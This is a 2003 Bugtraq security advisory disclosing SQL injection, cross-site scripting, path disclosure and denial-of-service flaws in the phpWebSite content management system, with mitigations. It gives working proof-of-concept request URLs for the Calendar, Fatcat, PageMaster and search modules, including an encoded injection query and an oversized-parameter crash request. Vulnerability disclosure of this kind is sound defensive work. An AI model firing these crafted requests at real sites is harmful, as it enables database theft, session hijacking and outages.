[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200308102316.h7ANGiB8010393@novappc.com>
Date: Mon, 11 Aug 2003 01:16:44 +0200
From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
To: bugtraq@...urityfocus.com
Subject: phpWebSite SQL Injection & DoS & XSS Vulnerabilities
phpWebSite SQL Injection & DoS & XSS Vulnerabilities
------
PRODUCT: phpWebSite
VENDOR: Appalachian State University
VULNERABLE VERSIONS:
- 0.9.x
- 0.8.x
- 0.7.x
- And older versions.
NO VULNERABLE VERSIONS
- ?
---------------------
Description:
phpWebSite provides a complete web site content management system. Web-
based administration allows for easy maintenance of interactive,
community-driven web sites.
---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------
I encountered SQL Injection vulnerabilities in some of the phpWebSite
modules , XSS ( Cross Site Scripting ) , Path Disclosures and a Denial
of Service attack.
-------------
| SQL |
| INJECTION |
-------------
I encountered SQL Injection vulnerabilities in the Calendar module ,
active in default configurations , that allows you
to execute SQL queries in the target server with the privileges of the
application user.
When you send a special-crafted command url to the Calendar script you
get a SQL error flag like this:
__________________________________________________________________
DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
VALUE]0110)) and active=1 [nativecode=1064
** You have an error in your SQL syntax near
'\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
___________________________________________________________________
This is an example error flag:
___________________________________________________________________
DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
startDate <= 2003\0-10110) or
(endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
[nativecode=1064
** You have an error in your SQL syntax near
'\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
and endDate ' at line 1]
___________________________________________________________________
For get this you must use this simple url:
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=
And you get the SQL Error flag. The error occurs when the query
includes the crafted value 2003[%00 = null]-1 .
You can design a successful query for get configuration values or
authentication data.
I desgined an url that makes a successful query ( no hostile query ) :
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1
it is ( without url encoding ) :
2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
20071205)) and active=1
It is needed to have a little knowledge of SQL ( in this case , MySQL )
for make a successful attack.
Other scripts of the Calendar module are affected by this hole , when
you send a crafted request like a + symbol at critical url variable
value
you get the "pure" sql server error flag and you can imagine ( i like
this word ) a sql query for view private information of the application
by
looking at the error pages , like an try-error method.
Another urls for probe are:
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=0&year=<
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=1%00&year=)SQL_INJECTION_FAKU
------------------
| XSS |
| vulnerabilities|
------------------
I encountered XSS security holes in some scripts of phpWebSite :
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
http://[HOST]/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]
http://[HOST]/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
Note that the Calendar & PageMaster & Fatcat modules are affected
COMPLETLY and all the script variables that are passed by url are
affected too by this.
When you access a hostile link with a xss attack in those scripts youur
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can
have more problems...
XSS AT SQL ERRORS:
If you send a crafted url command with a XSS attack code to some of the
scripts that are vulnerable against sql injection vulnerabilities , the
xss attack code will be executed
in the error page.
-----------------
| PATH |
| DISCLOSURES |
-----------------
I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
versions:
- Sambar Server 5.2 beta
- PHP 4.2.3 running as ISPAI module
- MySQL NT [normal service] 3.23.56
- Include_Path to the pear folder of phpwebsite
Sending this:
http://127.0.0.1/index.php?module=calendar&calendar[view]
=month&month=11&year=9 # You can try other things and get the same #
you get this:
Warning: localtime(): invalid local time in
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
Warning: localtime(): invalid local time in
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
<- more than fifty repetitions of this warning ->
It is a strange error , i think that it only occurs in MSWindows
installations.
Possible it occurs when the Pear library TimeZone.php script tries to
convert the localdate in unix time stamp format.
------------------
| DENIAL OF |
| SERVICE |
------------------
There is a DoS/Buffer Overflow Attack in a script inside the Calendar
module that allows you to crash the host running
the MySQL server and the phpWebSite scripts ( must be the same
computer ).
This is a basic proof of concept for this vulnerability :
http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
An attack like this causes a system global crash including the server
service and the mysql service.
-----------------
| SoLuTiOnS |
-----------------
1.- Be sure that the user of the phpWebSite database has only SELECT ,
INSERT and UPDATE privileges in only the phpWebSite
database.
2.- Use the php function eregi_replace for prevent XSS attacks.
3.- Turn php_error_flags to Off .
4.- Use in addition an external module if you are using apache like
mod_security .
5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
computers , tcp/ip , netbios , games , asp ,
Apache...... nothing !
WARNING ;-) : ( paranoic solution... )
-----------
| CONTACT |
-----------
Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________
NSRG-20-7
Powered by blists - more mailing lists